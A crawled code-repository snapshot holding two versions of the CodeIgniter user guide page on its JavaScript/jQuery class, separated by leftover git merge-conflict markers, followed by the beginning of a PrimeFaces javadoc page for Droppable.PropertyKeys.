class="c1">// for example $this-&gt;jquery-&gt;effect(&#39;bounce&#39;);</span> </pre></div> </div> <div class="section" id="hide-show"> <h4><a class="toc-backref" href="#id11">hide() / show()</a><a class="headerlink" href="#hide-show" title="Permalink to this headline">¶</a></h4> <p>Each of this functions will affect the visibility of an item on your page. hide() will set an item invisible, show() will reveal it.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">hide</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">show</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;speed&#8221; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&#8220;extra information&#8221; is optional, and could include a callback, or other additional information.</li> </ul> </div> <div class="section" id="toggle"> <h4><a class="toc-backref" href="#id12">toggle()</a><a class="headerlink" href="#toggle" title="Permalink to this headline">¶</a></h4> <p>toggle() will change the visibility of an item to the opposite of its current state, hiding visible elements, and revealing hidden ones.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">toggle</span><span class="p">(</span><span class="nx">target</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> </ul> </div> <div class="section" id="animate"> <h4><a class="toc-backref" href="#id13">animate()</a><a class="headerlink" href="#animate" title="Permalink to this headline">¶</a></h4> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">animate</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">parameters</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;parameters&#8221; in jQuery would generally include a series of CSS properties that you wish to change.</li> <li>&#8220;speed&#8221; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&#8220;extra information&#8221; is optional, and could include a callback, or other additional information.</li> </ul> <p>For a full summary, see <a class="reference external" href="http://api.jquery.com/animate/">http://api.jquery.com/animate/</a></p> <p>Here is an example of an animate() called on a div with an id of &#8220;note&#8221;, and triggered by a click using the jQuery library&#8217;s click() event.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$params</span> <span class="o">=</span> <span class="k">array</span><span class="p">(</span> <span class="s1">&#39;height&#39;</span> <span class="o">=&gt;</span> <span class="mi">80</span><span class="p">,</span> <span class="s1">&#39;width&#39;</span> <span class="o">=&gt;</span> <span class="s1">&#39;50%&#39;</span><span class="p">,</span> <span class="s1">&#39;marginLeft&#39;</span> <span class="o">=&gt;</span> <span class="mi">125</span> <span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">click</span><span class="p">(</span><span class="s1">&#39;#trigger&#39;</span><span class="p">,</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">animate</span><span class="p">(</span><span class="s1">&#39;#note&#39;</span><span class="p">,</span> <span class="nv">$params</span><span class="p">,</span> <span class="s1">&#39;normal&#39;</span><span class="p">));</span> </pre></div> </div> </div> <div class="section" id="fadein-fadeout"> <h4><a class="toc-backref" href="#id14">fadeIn() / fadeOut()</a><a class="headerlink" href="#fadein-fadeout" title="Permalink to this headline">¶</a></h4> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">fadeIn</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">fadeOut</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;speed&#8221; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&#8220;extra information&#8221; is optional, and could include a callback, or other additional information.</li> </ul> </div> <div class="section" id="toggleclass"> <h4><a class="toc-backref" href="#id15">toggleClass()</a><a class="headerlink" href="#toggleclass" title="Permalink to this headline">¶</a></h4> <p>This function will add or remove a CSS class to its target.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">toggleClass</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">class</span><span class="p">)</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;class&#8221; is any CSS classname. Note that this class must be defined and available in a CSS that is already loaded.</li> </ul> </div> <div class="section" id="id2"> <h4><a class="toc-backref" href="#id16">fadeIn() / fadeOut()</a><a class="headerlink" href="#id2" title="Permalink to this headline">¶</a></h4> <p>These effects cause an element(s) to disappear or reappear over time.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">fadeIn</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">fadeOut</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;speed&#8221; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&#8220;extra information&#8221; is optional, and could include a callback, or other additional information.</li> </ul> </div> <div class="section" id="slideup-slidedown-slidetoggle"> <h4><a class="toc-backref" href="#id17">slideUp() / slideDown() / slideToggle()</a><a class="headerlink" href="#slideup-slidedown-slidetoggle" title="Permalink to this headline">¶</a></h4> <p>These effects cause an element(s) to slide.</p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">slideUp</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">slideDown</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> <span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">slideToggle</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">speed</span><span class="p">,</span> <span class="nx">optional</span> <span class="nx">extra</span> <span class="nx">information</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;speed&#8221; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&#8220;extra information&#8221; is optional, and could include a callback, or other additional information.</li> </ul> </div> </div> <div class="section" id="plugins"> <h3><a class="toc-backref" href="#id18">Plugins</a><a class="headerlink" href="#plugins" title="Permalink to this headline">¶</a></h3> <p>Some select jQuery plugins are made available using this library.</p> <div class="section" id="corner"> <h4><a class="toc-backref" href="#id19">corner()</a><a class="headerlink" href="#corner" title="Permalink to this headline">¶</a></h4> <p>Used to add distinct corners to page elements. For full details see <a class="reference external" href="http://malsup.com/jquery/corner/">http://malsup.com/jquery/corner/</a></p> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">corner</span><span class="p">(</span><span class="nx">target</span><span class="p">,</span> <span class="nx">corner_style</span><span class="p">);</span> </pre></div> </div> <ul class="simple"> <li>&#8220;target&#8221; will be any valid jQuery selector or selectors.</li> <li>&#8220;corner_style&#8221; is optional, and can be set to any valid style such as round, sharp, bevel, bite, dog, etc. Individual corners can be set by following the style with a space and using &#8220;tl&#8221; (top left), &#8220;tr&#8221; (top right), &#8220;bl&#8221; (bottom left), or &#8220;br&#8221; (bottom right).</li> </ul> <div class="highlight-ci"><div class="highlight"><pre><span class="nv">$this</span><span class="o">-&gt;</span><span class="na">jquery</span><span class="o">-&gt;</span><span class="na">corner</span><span class="p">(</span><span class="s2">&quot;#note&quot;</span><span class="p">,</span> <span class="s2">&quot;cool tl br&quot;</span><span class="p">);</span> </pre></div> </div> </div> <div class="section" id="tablesorter"> <h4><a class="toc-backref" href="#id20">tablesorter()</a><a class="headerlink" href="#tablesorter" title="Permalink to this headline">¶</a></h4> <p>description to come</p> </div> <div class="section" id="modal"> <h4><a class="toc-backref" href="#id21">modal()</a><a class="headerlink" href="#modal" title="Permalink to this headline">¶</a></h4> <p>description to come</p> </div> <div class="section" id="calendar"> <h4><a class="toc-backref" href="#id22">calendar()</a><a class="headerlink" href="#calendar" title="Permalink to this headline">¶</a></h4> <p>description to come</p> </div> </div> </div> </div> </div> <footer> <div class="rst-footer-buttons" role="navigation" aria-label="footer navigation"> <a href="language.html" class="btn btn-neutral float-right" title="Language Class">Next <span class="fa fa-arrow-circle-right"></span></a> <a href="input.html" class="btn btn-neutral" title="Input Class"><span class="fa fa-arrow-circle-left"></span> Previous</a> </div> <hr/> <div role="contentinfo"> <p> &copy; Copyright 2014 - 2015, British Columbia Institute of Technology. Last updated on Mar 30, 2015. </p> </div> Built with <a href="http://sphinx-doc.org/">Sphinx</a> using a <a href="https://github.com/snide/sphinx_rtd_theme">theme</a> provided by <a href="https://readthedocs.org">Read the Docs</a>. </footer> </div> </div> </section> </div> <script type="text/javascript"> var DOCUMENTATION_OPTIONS = { URL_ROOT:'../', VERSION:'3.0.0', COLLAPSE_INDEX:false, FILE_SUFFIX:'.html', HAS_SOURCE: false }; </script> <script type="text/javascript" src="../_static/jquery.js"></script> <script type="text/javascript" src="../_static/underscore.js"></script> <script type="text/javascript" src="../_static/doctools.js"></script> <script type="text/javascript" src="../_static/js/theme.js"></script> <script type="text/javascript"> jQuery(function () { SphinxRtdTheme.StickyNav.enable(); }); </script> </body> </html> ======= <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>JavaScript Class : CodeIgniter User Guide</title> <style type='text/css' media='all'>@import url('../userguide.css');</style> <link rel='stylesheet' type='text/css' media='all' href='../userguide.css' /> <script type="text/javascript" src="../nav/nav.js"></script> <script type="text/javascript" src="../nav/prototype.lite.js"></script> <script type="text/javascript" src="../nav/moo.fx.js"></script> <script type="text/javascript" src="../nav/user_guide_menu.js"></script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta http-equiv='expires' content='-1' /> <meta http-equiv= 'pragma' content='no-cache' /> <meta name='robots' content='all' /> <meta name='author' content='ExpressionEngine Dev Team' /> <meta name='description' content='CodeIgniter User Guide' /> </head> <body> <!-- START NAVIGATION --> <div id="nav"><div id="nav_inner"><script type="text/javascript">create_menu('../');</script></div></div> <div id="nav2"><a name="top"></a><a href="javascript:void(0);" onclick="myHeight.toggle();"><img src="../images/nav_toggle_darker.jpg" width="153" height="44" border="0" title="Toggle Table of Contents" alt="Toggle Table of Contents" /></a></div> <div id="masthead"> <table cellpadding="0" cellspacing="0" border="0" style="width:100%"> <tr> <td><h1>CodeIgniter User Guide Version 2.1.4</h1></td> <td id="breadcrumb_right"><a href="../toc.html">Table of Contents Page</a></td> </tr> </table> </div> <!-- END NAVIGATION --> <!-- START BREADCRUMB --> <table cellpadding="0" cellspacing="0" border="0" style="width:100%"> <tr> <td id="breadcrumb"> <a href="http://codeigniter.com/">CodeIgniter Home</a> &nbsp;&#8250;&nbsp; <a href="../index.html">User Guide Home</a> &nbsp;&#8250;&nbsp; <a href="../general/drivers.html">Drivers</a> &nbsp;&#8250;&nbsp; JavaScript Driver </td> <td id="searchbox"><form method="get" action="http://www.google.com/search"><input type="hidden" name="as_sitesearch" id="as_sitesearch" value="ellislab.com/codeigniter/user-guide/" />Search User Guide&nbsp; <input type="text" class="input" style="width:200px;" name="q" id="q" size="31" maxlength="255" value="" />&nbsp;<input type="submit" class="submit" name="sa" value="Go" /></form></td> </tr> </table> <!-- END BREADCRUMB --> <br clear="all" /> <!-- START CONTENT --> <div id="content"> <p class="important"><strong>Note:</strong> This driver is experimental. Its feature set and implementation may change in future releases.</p><br> <h1>Javascript Class</h1> <p>CodeIgniter provides a library to help you with certain common functions that you may want to use with Javascript. Please note that CodeIgniter does not require the jQuery library to run, and that any scripting library will work equally well. The jQuery library is simply presented as a convenience if you choose to use it.</p> <h2>Initializing the Class</h2> <p>To initialize the Javascript class manually in your controller constructor, use the <dfn>$this-&gt;load-&gt;library</dfn> function. Currently, the only available library is jQuery, which will automatically be loaded like this:</p> <code>$this-&gt;load-&gt;library('javascript');</code> <p>The Javascript class also accepts parameters, <dfn>js_library_driver (string) default 'jquery'</dfn> and <dfn>autoload (bool) default TRUE</dfn>. You may override the defaults if you wish by sending an associative array:</p> <code>$this-&gt;load-&gt;library('javascript', array('js_library_driver' =&gt; 'scripto', 'autoload' =&gt; FALSE));</code> <p>Again, presently only 'jquery' is available. You may wish to set <dfn>autoload</dfn> to FALSE, though, if you do not want the jQuery library to automatically include a script tag for the main jQuery script file. This is useful if you are loading it from a location outside of CodeIgniter, or already have the script tag in your markup.</p> <p>Once loaded, the jQuery library object will be available using: <dfn>$this-&gt;javascript</dfn></p> <h2>Setup and Configuration</h2> <h3>Set these variables in your view</h3> <p>As a Javascript library, your files must be available to your application.</p> <p>As Javascript is a client side language, the library must be able to write content into your final output. This generally means a view. You'll need to include the following variables in the &lt;head&gt; sections of your output.</p> <p><code>&lt;?php echo $library_src;?&gt;<br /> &lt;?php echo $script_head;?&gt; </code></p> <p>$library_src, is where the actual library file will be loaded, as well as any subsequent plugin script calls; $script_head is where specific events, functions and other commands will be rendered.</p> <h3>Set the path to the librarys with config items</h3> <p>There are some configuration items in Javascript library. These can either be set in application/config.php, within its own config/javascript.php file, or within any controller usings the set_item() function. </p> <p>An image to be used as an &quot;ajax loader&quot;, or progress indicator. Without one, the simple text message of &quot;loading&quot; will appear when Ajax calls need to be made.</p> <p><code>$config['javascript_location'] = 'http://localhost/codeigniter/themes/js/jquery/';<br /> $config['javascript_ajax_img'] = 'images/ajax-loader.gif';</code></p> <p>If you keep your files in the same directories they were downloaded from, then you need not set this configuration items.</p> <h2>The jQuery Class</h2> <p>To initialize the jQuery class manually in your controller constructor, use the <dfn>$this-&gt;load-&gt;library</dfn> function:</p> <code>$this-&gt;load-&gt;library('jquery');</code> <p>You may send an optional parameter to determine whether or not a script tag for the main jQuery file will be automatically included when loading the library. It will be created by default. To prevent this, load the library as follows:</p> <code>$this-&gt;load-&gt;library('jquery', FALSE);</code> <p>Once loaded, the jQuery library object will be available using: <dfn>$this-&gt;jquery</dfn></p> <h2>jQuery Events</h2> <p>Events are set using the following syntax.</p> <p><code>$this-&gt;jquery-&gt;event('element_path', code_to_run());</code></p> <p>In the above example:</p> <ul> <li>&quot;event&quot; is any of blur, change, click, dblclick, error, focus, hover, keydown, keyup, load, mousedown, mouseup, mouseover, mouseup, resize, scroll, or unload.</li> <li>&quot;element_path&quot; is any valid <a href="http://docs.jquery.com/Selectors">jQuery selector</a>. Due to jQuery's unique selector syntax, this is usually an element id, or CSS selector. For example &quot;#notice_area&quot; would effect &lt;div id=&quot;notice_area&quot;&gt;, and &quot;#content a.notice&quot; would effect all anchors with a class of &quot;notice&quot; in the div with id &quot;content&quot;.</li> <li>&quot;code_to_run()&quot; is script your write yourself, or an action such as an effect from the jQuery library below.</li> </ul> <h2>Effects</h2> <p>The query library supports a powerful <a href="http://docs.jquery.com/Effects">Effects</a> repertoire. Before an effect can be used, it must be loaded:</p> <p><code>$this->jquery->effect([optional path] plugin name); // for example $this->jquery->effect('bounce'); </code></p> <h3>hide() / show()</h3> <p>Each of this functions will affect the visibility of an item on your page. hide() will set an item invisible, show() will reveal it.</p> <p><code>$this-&gt;jquery-&gt;hide(target, optional speed, optional extra information);<br /> $this-&gt;jquery-&gt;show(target, optional speed, optional extra information);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;speed&quot; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&quot;extra information&quot; is optional, and could include a callback, or other additional information.</li> </ul> <h3>toggle()</h3> <p>toggle() will change the visibility of an item to the opposite of its current state, hiding visible elements, and revealing hidden ones.</p> <p><code>$this-&gt;jquery-&gt;toggle(target);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> </ul> <h3>animate()</h3> <p><code> $this-&gt;jquery-&gt;animate(target, parameters, optional speed, optional extra information);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;parameters&quot; in jQuery would generally include a series of CSS properties that you wish to change.</li> <li>&quot;speed&quot; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&quot;extra information&quot; is optional, and could include a callback, or other additional information.</li> </ul> <p>For a full summary, see <a href="http://docs.jquery.com/Effects/animate">http://docs.jquery.com/Effects/animate</a></p> <p>Here is an example of an animate() called on a div with an id of &quot;note&quot;, and triggered by a click using the jQuery library's click() event.</p> <p><code> $params = array(<br /> 'height' =&gt; 80,<br /> 'width' =&gt; '50%',<br /> 'marginLeft' =&gt; 125<br /> );<br /> $this-&gt;jquery-&gt;click('#trigger', $this-&gt;jquery-&gt;animate('#note', $params, normal));</code></p> <h3>fadeIn() / fadeOut()</h3> <p><code>$this-&gt;jquery-&gt;fadeIn(target, optional speed, optional extra information);<br /> $this-&gt;jquery-&gt;fadeOut(target, optional speed, optional extra information);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;speed&quot; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&quot;extra information&quot; is optional, and could include a callback, or other additional information.</li> </ul> <h3>toggleClass()</h3> <p>This function will add or remove a CSS class to its target.</p> <p><code>$this-&gt;jquery-&gt;toggleClass(target, class)</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;class&quot; is any CSS classname. Note that this class must be defined and available in a CSS that is already loaded.</li> </ul> <h3>fadeIn() / fadeOut()</h3> <p>These effects cause an element(s) to disappear or reappear over time.</p> <p><code>$this-&gt;jquery-&gt;fadeIn(target, optional speed, optional extra information);<br /> $this-&gt;jquery-&gt;fadeOut(target, optional speed, optional extra information);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;speed&quot; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&quot;extra information&quot; is optional, and could include a callback, or other additional information.</li> </ul> <h3>slideUp() / slideDown() / slideToggle()</h3> <p>These effects cause an element(s) to slide.</p> <p><code>$this-&gt;jquery-&gt;slideUp(target, optional speed, optional extra information);<br /> $this-&gt;jquery-&gt;slideDown(target, optional speed, optional extra information);<br /> $this-&gt;jquery-&gt;slideToggle(target, optional speed, optional extra information);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;speed&quot; is optional, and is set to either slow, normal, fast, or alternatively a number of milliseconds.</li> <li>&quot;extra information&quot; is optional, and could include a callback, or other additional information.</li> </ul> <h2>Plugins</h2> <p> <p>Some select jQuery plugins are made available using this library.</p> <h3>corner()</h3> <p>Used to add distinct corners to page elements. For full details see <a href="http://www.malsup.com/jquery/corner/">http://www.malsup.com/jquery/corner/</a></p> <p><code>$this-&gt;jquery-&gt;corner(target, corner_style);</code></p> <ul> <li>&quot;target&quot; will be any valid jQuery selector or selectors.</li> <li>&quot;corner_style&quot; is optional, and can be set to any valid style such as round, sharp, bevel, bite, dog, etc. Individual corners can be set by following the style with a space and using &quot;tl&quot; (top left), &quot;tr&quot; (top right), &quot;bl&quot; (bottom left), or &quot;br&quot; (bottom right).</li> </ul> <p><code>$this-&gt;jquery-&gt;corner(&quot;#note&quot;, &quot;cool tl br&quot;);</code></p> <h3>tablesorter()</h3> <p>description to come</p> <h3>modal()</h3> <p>description to come</p> <h3>calendar()</h3> <p>description to come</p> </div> <!-- END CONTENT --> <div id="footer"> <p> Previous Topic:&nbsp;&nbsp;<a href="../database/index.html">Database Class</a> &nbsp;&nbsp;&nbsp;&middot;&nbsp;&nbsp; <a href="#top">Top of Page</a>&nbsp;&nbsp;&nbsp;&middot;&nbsp;&nbsp; <a href="../index.html">User Guide Home</a>&nbsp;&nbsp;&nbsp;&middot;&nbsp;&nbsp; Next Topic:&nbsp;&nbsp;<a href="../helpers/array_helper.html">Array Helper</a></p> <p><a href="http://codeigniter.com">CodeIgniter</a> &nbsp;&middot;&nbsp; Copyright &#169; 2006 - 2012 &nbsp;&middot;&nbsp; <a href="http://ellislab.com/">EllisLab, Inc.</a></p> </div> </body> </html> >>>>>>> 4c6d7a26cdf617bfd273b76567440aba515383ac
UnaCloudWebPortal/lib/primefaces/apidocs/org/primefaces/component/dnd/class-use/Droppable.PropertyKeys.html
UnaCloud/unacloudIaaS1.0
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!--NewPage--> <HTML> <HEAD> <!-- Generated by javadoc (build 1.6.0_29) on Tue Feb 14 12:32:37 EET 2012 --> <META http-equiv="Content-Type" content="text/html; charset=UTF-8"> <TITLE> Uses of Class org.primefaces.component.dnd.Droppable.PropertyKeys (primefaces-3.1.1 3.1.1 API) </TITLE> <META NAME="date" CONTENT="2012-02-14"> <LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style"> <SCRIPT type="text/javascript"> function windowTitle() { if (location.href.indexOf('is-external=true') == -1) { parent.document.title="Uses of Class org.primefaces.component.dnd.Droppable.PropertyKeys (primefaces-3.1.1 3.1.1 API)"; } } </SCRIPT> <NOSCRIPT> </NOSCRIPT> </HEAD> <BODY BGCOLOR="white" onload="windowTitle();"> <HR> <!-- ========= START OF TOP NAVBAR ======= --> <A NAME="navbar_top"><!-- --></A> <A HREF="#skip-navbar_top" title="Skip navigation links"></A> <TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY=""> <TR> <TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A NAME="navbar_top_firstrow"><!-- --></A> <TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY=""> <TR ALIGN="center" VALIGN="top"> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd"><FONT CLASS="NavBarFont1"><B>Class</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> &nbsp;<FONT CLASS="NavBarFont1Rev"><B>Use</B></FONT>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A>&nbsp;</TD> <TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A>&nbsp;</TD> </TR> </TABLE> </TD> <TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM> </EM> </TD> </TR> <TR> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> &nbsp;PREV&nbsp; &nbsp;NEXT</FONT></TD> <TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2"> <A HREF="../../../../../index.html?org/primefaces/component/dnd//class-useDroppable.PropertyKeys.html" target="_top"><B>FRAMES</B></A> &nbsp; &nbsp;<A HREF="Droppable.PropertyKeys.html" target="_top"><B>NO FRAMES</B></A> &nbsp; &nbsp;<SCRIPT type="text/javascript"> <!-- if(window==top) { document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>'); } //--> </SCRIPT> <NOSCRIPT> <A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A> </NOSCRIPT> </FONT></TD> </TR> </TABLE> <A NAME="skip-navbar_top"></A> <!-- ========= END OF TOP NAVBAR ========= --> <HR> <CENTER> <H2> <B>Uses of Class<br>org.primefaces.component.dnd.Droppable.PropertyKeys</B></H2> </CENTER> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Packages that use <A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd">Droppable.PropertyKeys</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD><A HREF="#org.primefaces.component.dnd"><B>org.primefaces.component.dnd</B></A></TD> <TD>&nbsp;&nbsp;</TD> </TR> </TABLE> &nbsp; <P> <A NAME="org.primefaces.component.dnd"><!-- --></A> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor"> <TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2"> Uses of <A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd">Droppable.PropertyKeys</A> in <A HREF="../../../../../org/primefaces/component/dnd/package-summary.html">org.primefaces.component.dnd</A></FONT></TH> </TR> </TABLE> &nbsp; <P> <TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY=""> <TR BGCOLOR="#CCCCFF" CLASS="TableSubHeadingColor"> <TH ALIGN="left" COLSPAN="2">Methods in <A HREF="../../../../../org/primefaces/component/dnd/package-summary.html">org.primefaces.component.dnd</A> that return <A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd">Droppable.PropertyKeys</A></FONT></TH> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;<A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in org.primefaces.component.dnd">Droppable.PropertyKeys</A></CODE></FONT></TD> <TD><CODE><B>Droppable.PropertyKeys.</B><B><A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html#valueOf(java.lang.String)">valueOf</A></B>(<A HREF="http://download.oracle.com/javase/1.5.0/docs/api/java/lang/String.html?is-external=true" title="class or interface in java.lang">String</A>&nbsp;name)</CODE> <BR> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Returns the enum constant of this type with the specified name.</TD> </TR> <TR BGCOLOR="white" CLASS="TableRowColor"> <TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1"> <CODE>static&nbsp;<A HREF="../../../../../org/primefaces/component/dnd/Droppable.PropertyKeys.html" title="enum in 